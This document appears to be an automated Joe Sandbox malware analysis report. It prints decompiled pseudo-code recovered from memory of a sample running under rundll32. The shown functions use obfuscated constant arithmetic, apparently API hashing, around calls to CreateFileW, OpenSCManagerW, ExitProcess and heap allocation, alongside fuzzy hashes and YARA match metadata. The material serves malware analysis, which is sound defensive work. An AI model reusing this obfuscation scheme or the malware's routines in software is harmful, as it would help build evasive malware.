                                                                                                                                                                                      				_v20 = 0xae8f68;
                                                                                                                                                                                      				_t69 = 0x28;
                                                                                                                                                                                      				_v20 = _v20 / _t68;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x00028d2f;
                                                                                                                                                                                      				_v16 = 0xdc96c3;
                                                                                                                                                                                      				_v16 = _v16 >> 3;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x001086c5;
                                                                                                                                                                                      				_v8 = 0xcc437a;
                                                                                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                                                                                      				_v8 = _v8 / _t69;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00a46bd6;
                                                                                                                                                                                      				E0282E399(_t69, _v8 % _t69, _t69, 0xa2449830, 0x1b2, 0xa236d704);
                                                                                                                                                                                      				_t66 = CreateFileW(_a8, _t76, _a44, 0, _a16, _a40, 0); // executed
                                                                                                                                                                                      				return _t66;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x02822d0e
                                                                                                                                                                                      0x02822d13
                                                                                                                                                                                      0x02822d15
                                                                                                                                                                                      0x02822d18
                                                                                                                                                                                      0x02822d1b
                                                                                                                                                                                      0x02822d1c
                                                                                                                                                                                      0x02822d1f
                                                                                                                                                                                      0x02822d22
                                                                                                                                                                                      0x02822d25
                                                                                                                                                                                      0x02822d28
                                                                                                                                                                                      0x02822d29
                                                                                                                                                                                      0x02822d2c
                                                                                                                                                                                      0x02822d30
                                                                                                                                                                                      0x02822d31
                                                                                                                                                                                      0x02822d36
                                                                                                                                                                                      0x02822d3f
                                                                                                                                                                                      0x02822d42
                                                                                                                                                                                      0x02822d45
                                                                                                                                                                                      0x02822d52
                                                                                                                                                                                      0x02822d55
                                                                                                                                                                                      0x02822d5c
                                                                                                                                                                                      0x02822d5f
                                                                                                                                                                                      0x02822d66
                                                                                                                                                                                      0x02822d72
                                                                                                                                                                                      0x02822d73
                                                                                                                                                                                      0x02822d78
                                                                                                                                                                                      0x02822d82
                                                                                                                                                                                      0x02822d89
                                                                                                                                                                                      0x02822d8d
                                                                                                                                                                                      0x02822d94
                                                                                                                                                                                      0x02822d9b
                                                                                                                                                                                      0x02822da9
                                                                                                                                                                                      0x02822dac
                                                                                                                                                                                      0x02822dca
                                                                                                                                                                                      0x02822de1
                                                                                                                                                                                      0x02822de8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(001086C5,?,?,00000000,?,?,00000000), ref: 02822DE1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
                                                                                                                                                                                      • Instruction ID: e92a88b4ef78f7c9e394d08b871ffff8181eba0cd2ae7b602b3c76a8e09f4e8d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3921037690020CBBDF05DF99CD498DEBFB6FB88304F108049F914AA260D7B59A14DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                      			E02833231(intOrPtr _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                      				void* _t65;
                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				E02818002(_t51);
                                                                                                                                                                                      				_v20 = 0x8ddd0f;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xe03e86bb;
                                                                                                                                                                                      				_v20 = _v20 + 0xffff1f0e;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xe0b01721;
                                                                                                                                                                                      				_v16 = 0x43c95a;
                                                                                                                                                                                      				_t66 = 3;
                                                                                                                                                                                      				_v16 = _v16 * 0x6c;
                                                                                                                                                                                      				_t67 = 0x1d;
                                                                                                                                                                                      				_v16 = _v16 / _t66;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x0989b3a6;
                                                                                                                                                                                      				_v12 = 0xb34ce2;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x4f195b2f;
                                                                                                                                                                                      				_v12 = _v12 / _t67;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x02b53c02;
                                                                                                                                                                                      				_v8 = 0x60e613;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff76e9;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff1349;
                                                                                                                                                                                      				_t68 = 0x34;
                                                                                                                                                                                      				_v8 = _v8 / _t68;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x000b7b8d;
                                                                                                                                                                                      				E0282E399(_t68, _v8 % _t68, _t68, 0x1f1ae65e, 0x189, 0x1de1df5f);
                                                                                                                                                                                      				_t65 = OpenSCManagerW(0, 0, _a8); // executed
                                                                                                                                                                                      				return _t65;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x02833238
                                                                                                                                                                                      0x0283323d
                                                                                                                                                                                      0x02833240
                                                                                                                                                                                      0x02833243
                                                                                                                                                                                      0x02833244
                                                                                                                                                                                      0x02833245
                                                                                                                                                                                      0x0283324a
                                                                                                                                                                                      0x02833253
                                                                                                                                                                                      0x0283325a
                                                                                                                                                                                      0x02833261
                                                                                                                                                                                      0x02833268
                                                                                                                                                                                      0x02833275
                                                                                                                                                                                      0x02833278
                                                                                                                                                                                      0x02833280
                                                                                                                                                                                      0x02833281
                                                                                                                                                                                      0x02833286
                                                                                                                                                                                      0x0283328d
                                                                                                                                                                                      0x02833294
                                                                                                                                                                                      0x028332a2
                                                                                                                                                                                      0x028332a7
                                                                                                                                                                                      0x028332ae
                                                                                                                                                                                      0x028332b5
                                                                                                                                                                                      0x028332bc
                                                                                                                                                                                      0x028332c6
                                                                                                                                                                                      0x028332cc
                                                                                                                                                                                      0x028332cf
                                                                                                                                                                                      0x028332f2
                                                                                                                                                                                      0x028332ff
                                                                                                                                                                                      0x02833305

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,0989B3A6,?,?,?,?,?,?,?,?), ref: 028332FF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ManagerOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1889721586-0
                                                                                                                                                                                      • Opcode ID: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
                                                                                                                                                                                      • Instruction ID: d22227949b6c3600bbafa92548413a4bb290e4639a0adb0f16af5a68247ba747
                                                                                                                                                                                      • Opcode Fuzzy Hash: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21347AE01218FBDB04DFA9C94A9DEBFB6FF44310F10C18AE515AA250D7B55B119F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                      			E02829038(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				unsigned int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                      				int _t66;
                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				E02818002(_t53);
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v32 = 0xed3f98;
                                                                                                                                                                                      				_v16 = 0x2a9dca;
                                                                                                                                                                                      				_t68 = 0x79;
                                                                                                                                                                                      				_v16 = _v16 / _t68;
                                                                                                                                                                                      				_v16 = _v16 << 2;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000f760a;
                                                                                                                                                                                      				_v20 = 0x68a68c;
                                                                                                                                                                                      				_t69 = 0x7f;
                                                                                                                                                                                      				_v20 = _v20 / _t69;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x0005afe9;
                                                                                                                                                                                      				_v8 = 0x320c70;
                                                                                                                                                                                      				_t70 = 0x39;
                                                                                                                                                                                      				_v8 = _v8 / _t70;
                                                                                                                                                                                      				_v8 = _v8 | 0xebb37c35;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x7178f36a;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x9ac8a43f;
                                                                                                                                                                                      				_v12 = 0x21358c;
                                                                                                                                                                                      				_v12 = _v12 << 0xe;
                                                                                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x00063172;
                                                                                                                                                                                      				E0282E399(_t70, _v8 % _t70, _t70, 0xa2449830, 0x35, 0x3485d61b);
                                                                                                                                                                                      				_t66 = FindCloseChangeNotification(_a4); // executed
                                                                                                                                                                                      				return _t66;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x0282903e
                                                                                                                                                                                      0x02829041
                                                                                                                                                                                      0x02829046
                                                                                                                                                                                      0x0282904b
                                                                                                                                                                                      0x02829051
                                                                                                                                                                                      0x02829055
                                                                                                                                                                                      0x0282905c
                                                                                                                                                                                      0x02829068
                                                                                                                                                                                      0x0282906d
                                                                                                                                                                                      0x02829072
                                                                                                                                                                                      0x02829076
                                                                                                                                                                                      0x0282907d
                                                                                                                                                                                      0x02829087
                                                                                                                                                                                      0x0282908c
                                                                                                                                                                                      0x02829091
                                                                                                                                                                                      0x02829098
                                                                                                                                                                                      0x028290a2
                                                                                                                                                                                      0x028290a8
                                                                                                                                                                                      0x028290ab
                                                                                                                                                                                      0x028290b2
                                                                                                                                                                                      0x028290b9
                                                                                                                                                                                      0x028290c0
                                                                                                                                                                                      0x028290c7
                                                                                                                                                                                      0x028290cb
                                                                                                                                                                                      0x028290cf
                                                                                                                                                                                      0x028290ef
                                                                                                                                                                                      0x028290fa
                                                                                                                                                                                      0x028290ff

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00063172,?,?,?,?,?,?,?,028309EF), ref: 028290FA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                      • Opcode ID: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
                                                                                                                                                                                      • Instruction ID: 59d0080a1e802da39b467381be9fd6b22fc6b74b9d1f04664f49d6bb38b9cacc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 232144B5E0020CEBDF04DFE5C80A99EBBB2EB40304F10C099E514AA250D7B95B558F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E0281F3F7() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v36 = 0xb0bfd;
                                                                                                                                                                                      				_v32 = 0x231de0;
                                                                                                                                                                                      				_v20 = 0x822c7a;
                                                                                                                                                                                      				_t47 = 0x31;
                                                                                                                                                                                      				_push(_t47);
                                                                                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x12d3a120;
                                                                                                                                                                                      				_v12 = 0x122796;
                                                                                                                                                                                      				_v12 = _v12 | 0x5fffe7f7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5ff36a5b;
                                                                                                                                                                                      				_v8 = 0xc53dc4;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff669e;
                                                                                                                                                                                      				_v8 = _v8 + 0xba03;
                                                                                                                                                                                      				_v8 = _v8 + 0x1f9e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00c2122b;
                                                                                                                                                                                      				_v16 = 0x5857ad;
                                                                                                                                                                                      				_v16 = _v16 / _t47;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000b8ebe;
                                                                                                                                                                                      				E0282E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
                                                                                                                                                                                      				ExitProcess(0);
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x0281f3fd
                                                                                                                                                                                      0x0281f403
                                                                                                                                                                                      0x0281f407
                                                                                                                                                                                      0x0281f40e
                                                                                                                                                                                      0x0281f415
                                                                                                                                                                                      0x0281f422
                                                                                                                                                                                      0x0281f423
                                                                                                                                                                                      0x0281f429
                                                                                                                                                                                      0x0281f42c
                                                                                                                                                                                      0x0281f433
                                                                                                                                                                                      0x0281f43a
                                                                                                                                                                                      0x0281f441
                                                                                                                                                                                      0x0281f448
                                                                                                                                                                                      0x0281f44f
                                                                                                                                                                                      0x0281f456
                                                                                                                                                                                      0x0281f45d
                                                                                                                                                                                      0x0281f464
                                                                                                                                                                                      0x0281f46b
                                                                                                                                                                                      0x0281f479
                                                                                                                                                                                      0x0281f47c
                                                                                                                                                                                      0x0281f495
                                                                                                                                                                                      0x0281f49f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0281F49F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                      • Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction ID: 4e96fc956494f864715de290195e0e844d52fa6b02bd28aa0b126b73e79bd561
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 551106B5E1021DEBDF04DFE4C94A6EEBBB4FB14315F108188E521AA240E7B45B548F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,6E9ECB0C,?,?,6E9EC074,00000400,FFFDC801,?,?,00000001), ref: 6E9F231B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: cb60a9ef79f3a6fc1b5292298f35a7ba7ca47847f40903f04bbe3397e8633307
                                                                                                                                                                                      • Instruction ID: 1c14371e5de9f874e4df52b36b9484a2dc4593ffae238ccdca60378746c72ea7
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb60a9ef79f3a6fc1b5292298f35a7ba7ca47847f40903f04bbe3397e8633307
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E0E571101262DBEB5216E65C0079A764CEF83AA1F014520AC50A72C4DFB0D8438FE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                      			E6E9DD380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				long _v40;
                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                      				void* _v48;
                                                                                                                                                                                      				long _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				void* _v72;
                                                                                                                                                                                      				long* _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int _v1096;
                                                                                                                                                                                      				long _v1100;
                                                                                                                                                                                      				void* _v1104;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                      				void* _t143;
                                                                                                                                                                                      				void* _t148;
                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                      				intOrPtr _t151;
                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                      				signed int _t160;
                                                                                                                                                                                      				void** _t161;
                                                                                                                                                                                      				void* _t167;
                                                                                                                                                                                      				long _t171;
                                                                                                                                                                                      				signed int _t172;
                                                                                                                                                                                      				long _t173;
                                                                                                                                                                                      				void* _t179;
                                                                                                                                                                                      				void* _t181;
                                                                                                                                                                                      				long _t194;
                                                                                                                                                                                      				signed int _t195;
                                                                                                                                                                                      				signed char _t196;
                                                                                                                                                                                      				signed int _t199;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				signed int _t211;
                                                                                                                                                                                      				signed int _t213;
                                                                                                                                                                                      				signed int _t214;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                      				intOrPtr* _t224;
                                                                                                                                                                                      				intOrPtr _t226;
                                                                                                                                                                                      				signed int _t228;
                                                                                                                                                                                      				char* _t229;
                                                                                                                                                                                      				signed int _t230;
                                                                                                                                                                                      				signed int _t232;
                                                                                                                                                                                      				signed int _t238;
                                                                                                                                                                                      				signed int _t241;
                                                                                                                                                                                      				signed int _t242;
                                                                                                                                                                                      				WCHAR* _t247;
                                                                                                                                                                                      				long _t248;
                                                                                                                                                                                      				signed int _t249;
                                                                                                                                                                                      				signed int _t252;
                                                                                                                                                                                      				char* _t264;
                                                                                                                                                                                      				void* _t265;
                                                                                                                                                                                      				void* _t267;
                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                      				signed char* _t273;
                                                                                                                                                                                      				signed int _t274;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				intOrPtr _t281;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t262 = __esi;
                                                                                                                                                                                      				_t245 = __edi;
                                                                                                                                                                                      				_t192 = __ebx;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t281 = _t280 - 0x440;
                                                                                                                                                                                      				_v32 = _t281;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39D0;
                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_t142 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      				if(_t142 != 0) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t143 = HeapAlloc(_t142, 0, 0xa);
                                                                                                                                                                                      					if(_t143 == 0) {
                                                                                                                                                                                      						goto L94;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t264 = "UST_BACKTRACE";
                                                                                                                                                                                      						_t241 = 1;
                                                                                                                                                                                      						_t211 = 0;
                                                                                                                                                                                      						 *_t143 = 0x52;
                                                                                                                                                                                      						_v1104 = _t143;
                                                                                                                                                                                      						_v1100 = 5;
                                                                                                                                                                                      						_v1096 = 1;
                                                                                                                                                                                      						_v44 = 0;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							_v36 = _t211;
                                                                                                                                                                                      							if(_t211 == 0) {
                                                                                                                                                                                      								goto L10;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v44 = 0;
                                                                                                                                                                                      							_t211 = 0;
                                                                                                                                                                                      							if(_t241 != _v1100) {
                                                                                                                                                                                      								L6:
                                                                                                                                                                                      								_t245 = _v36;
                                                                                                                                                                                      								 *((short*)(_t143 + _t241 * 2)) = _v36;
                                                                                                                                                                                      								_t241 = _t241 + 1;
                                                                                                                                                                                      								_v1096 = _t241;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L13:
                                                                                                                                                                                      								_v40 = _t264;
                                                                                                                                                                                      								_v20 = 0;
                                                                                                                                                                                      								_v48 = _t241;
                                                                                                                                                                                      								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
                                                                                                                                                                                      								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
                                                                                                                                                                                      								asm("sbb eax, 0x0");
                                                                                                                                                                                      								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
                                                                                                                                                                                      								E6E9F9A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
                                                                                                                                                                                      								_t281 = _t281 + 4;
                                                                                                                                                                                      								_t143 = _v1104;
                                                                                                                                                                                      								_t241 = _v48;
                                                                                                                                                                                      								_t264 = _v40;
                                                                                                                                                                                      								_t211 = _v44;
                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L10:
                                                                                                                                                                                      							__eflags = _t264 - 0x6ea1face;
                                                                                                                                                                                      							if(_t264 != 0x6ea1face) {
                                                                                                                                                                                      								_t196 =  *_t264 & 0x000000ff;
                                                                                                                                                                                      								_t229 =  &(_t264[1]);
                                                                                                                                                                                      								_t249 = _t196 & 0x000000ff;
                                                                                                                                                                                      								__eflags = _t196;
                                                                                                                                                                                      								if(_t196 < 0) {
                                                                                                                                                                                      									_v36 = _t249 & 0x0000001f;
                                                                                                                                                                                      									__eflags = _t229 - 0x6ea1face;
                                                                                                                                                                                      									if(_t229 == 0x6ea1face) {
                                                                                                                                                                                      										_t230 = 0;
                                                                                                                                                                                      										__eflags = _t196 - 0xdf;
                                                                                                                                                                                      										_t252 = 0;
                                                                                                                                                                                      										_v40 = 0x6ea1face;
                                                                                                                                                                                      										if(_t196 > 0xdf) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_v36 = _v36 << 6;
                                                                                                                                                                                      											_t264 = 0x6ea1face;
                                                                                                                                                                                      											_t211 = 0;
                                                                                                                                                                                      											__eflags = _t241 - _v1100;
                                                                                                                                                                                      											if(_t241 != _v1100) {
                                                                                                                                                                                      												goto L6;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L13;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t238 = _t264[1] & 0x000000ff;
                                                                                                                                                                                      										_t264 =  &(_t264[2]);
                                                                                                                                                                                      										_t230 = _t238 & 0x0000003f;
                                                                                                                                                                                      										__eflags = _t196 - 0xdf;
                                                                                                                                                                                      										if(_t196 <= 0xdf) {
                                                                                                                                                                                      											_t199 = _v36 << 0x00000006 | _t230;
                                                                                                                                                                                      											__eflags = _t199 - 0xffff;
                                                                                                                                                                                      											if(_t199 > 0xffff) {
                                                                                                                                                                                      												goto L32;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags = _t264 - 0x6ea1face;
                                                                                                                                                                                      											if(_t264 == 0x6ea1face) {
                                                                                                                                                                                      												_t252 = 0;
                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                      												_v40 = 0x6ea1face;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_v40 =  &(_t264[1]);
                                                                                                                                                                                      												_t252 =  *_t264 & 0x3f;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L25:
                                                                                                                                                                                      											_t232 = _t230 << 0x00000006 | _t252;
                                                                                                                                                                                      											__eflags = _t196 - 0xf0;
                                                                                                                                                                                      											if(_t196 < 0xf0) {
                                                                                                                                                                                      												_t199 = _v36 << 0x0000000c | _t232;
                                                                                                                                                                                      												_t264 = _v40;
                                                                                                                                                                                      												__eflags = _t199 - 0xffff;
                                                                                                                                                                                      												if(_t199 > 0xffff) {
                                                                                                                                                                                      													goto L32;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L22;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t273 = _v40;
                                                                                                                                                                                      												__eflags = _t273 - 0x6ea1face;
                                                                                                                                                                                      												if(_t273 == 0x6ea1face) {
                                                                                                                                                                                      													_t274 = 0;
                                                                                                                                                                                      													__eflags = 0;
                                                                                                                                                                                      													_v40 = 0x6ea1face;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_v40 =  &(_t273[1]);
                                                                                                                                                                                      													_t274 =  *_t273 & 0x3f;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
                                                                                                                                                                                      												_t264 = _v40;
                                                                                                                                                                                      												__eflags = _t199 - 0xffff;
                                                                                                                                                                                      												if(_t199 <= 0xffff) {
                                                                                                                                                                                      													L22:
                                                                                                                                                                                      													_v36 = _t199;
                                                                                                                                                                                      													_t211 = 0;
                                                                                                                                                                                      													__eflags = _t241 - _v1100;
                                                                                                                                                                                      													if(_t241 != _v1100) {
                                                                                                                                                                                      														goto L6;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L13;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													L32:
                                                                                                                                                                                      													_t200 = _t199 + 0xffff0000;
                                                                                                                                                                                      													_v40 = _t264;
                                                                                                                                                                                      													_v36 = _t200 >> 0x0000000a | 0x0000d800;
                                                                                                                                                                                      													_t264 = _v40;
                                                                                                                                                                                      													_t211 = _t200 & 0x000003ff | 0x0000dc00;
                                                                                                                                                                                      													_v44 = _t211;
                                                                                                                                                                                      													__eflags = _t241 - _v1100;
